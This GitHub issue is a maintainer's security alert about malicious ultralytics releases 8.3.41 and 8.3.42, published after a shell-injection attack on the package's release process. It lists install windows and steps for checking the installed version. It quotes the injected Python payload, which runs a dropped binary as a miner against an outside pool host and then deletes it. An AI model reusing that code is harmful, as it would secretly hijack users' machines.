Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

🚨 Security Alert from Ultralytics #19

Closed
jhj0517 opened this issue Dec 6, 2024 · 0 comments
Closed

🚨 Security Alert from Ultralytics #19

jhj0517 opened this issue Dec 6, 2024 · 0 comments
Assignees
@jhj0517
Labels
Alert Emergency Alert

Comments

@jhj0517
Copy link
Owner

jhj0517 commented Dec 6, 2024
edited
Loading

🚨 Security Alert from Ultralytics

The ultralytics versions 8.3.41, 8.3.42, 8.3.45, 8.3.46 are infected by malware.
This is for the people who may have installed this WebUI between this timeline (UTC):

ultralytics==8.3.41 ( was listed on PyPI for about 12 hours )

  • 2024-12-04 20:51 ~2024-12-05 09:15

ultralytics==8.3.42 ( was listed on PyPI for about 1 hour )

  • 2024-12-05 12:47 ~ 2024-12-05 13:47

There was an echo shell injection attack on ultralytics, 2024-12-05, about 48 hours ago.

Ultralytics is the object segmentation package that has more than 33k stars on Github, in this project it's used to detect the face part of the image.

The hacker successfully released the new versions of this package using echo shell injection - PR #18020, PR #18018.

The malicious versions are ultralytics==8.3.41 and ultralytics==8.3.42.

🚨 Severity

The severity is very high.

The injected code is:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

It gets the permission from your system for executable files, runs crypto mining job, and execute other malicious executable file.

Not only is it likely to be running crypto-mining code, it could be full-blown infostealer malware or whatever.

What you should do

Again, the infected packages are ultralytics==8.3.41 and ultralytics==8.3.42.

If you installed this WebUI between the timelines below (UTC) :

  • 2024-12-04 20:51 ~2024-12-05 09:15

  • 2024-12-05 12:47 ~ 2024-12-05 13:47

you're possibly infected by the malicious ultralytics version.

You should now check the installed ultralytics version with this WebUI

How to?

  1. Open your terminal
  2. Navigate to the project directory.
cd "/path/to/AdvancedLivePortrait-WebUI"
  1. Activate the virtual environment:
  • On Windows:
.\venv\Scripts\activate
  • On macOS/Linux:
source venv/bin/activate
  1. It will then display (venv) in front of the terminal. In this state, run pip show
(venv) pip show ultralytics

It will display the version of ultralytics.
If the version is 8.3.41 or 8.3.42, it's recommended that you reinstall your operating system after backing up your important files to another server.

Etc

The vulnerability was reported to Github Advisory prior to this attack - GHSA-7x29-qqmq-v6qc
And the issue is now tracked by ultralytics/ultralytics#18027
@jhj0517 jhj0517 added the Alert Emergency Alert label Dec 6, 2024
@jhj0517 jhj0517 self-assigned this Dec 6, 2024
@jhj0517 jhj0517 pinned this issue Dec 6, 2024
@jhj0517 jhj0517 closed this as completed Dec 22, 2024
@jhj0517 jhj0517 unpinned this issue Dec 22, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@jhj0517 jhj0517

Labels
Alert Emergency Alert
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@jhj0517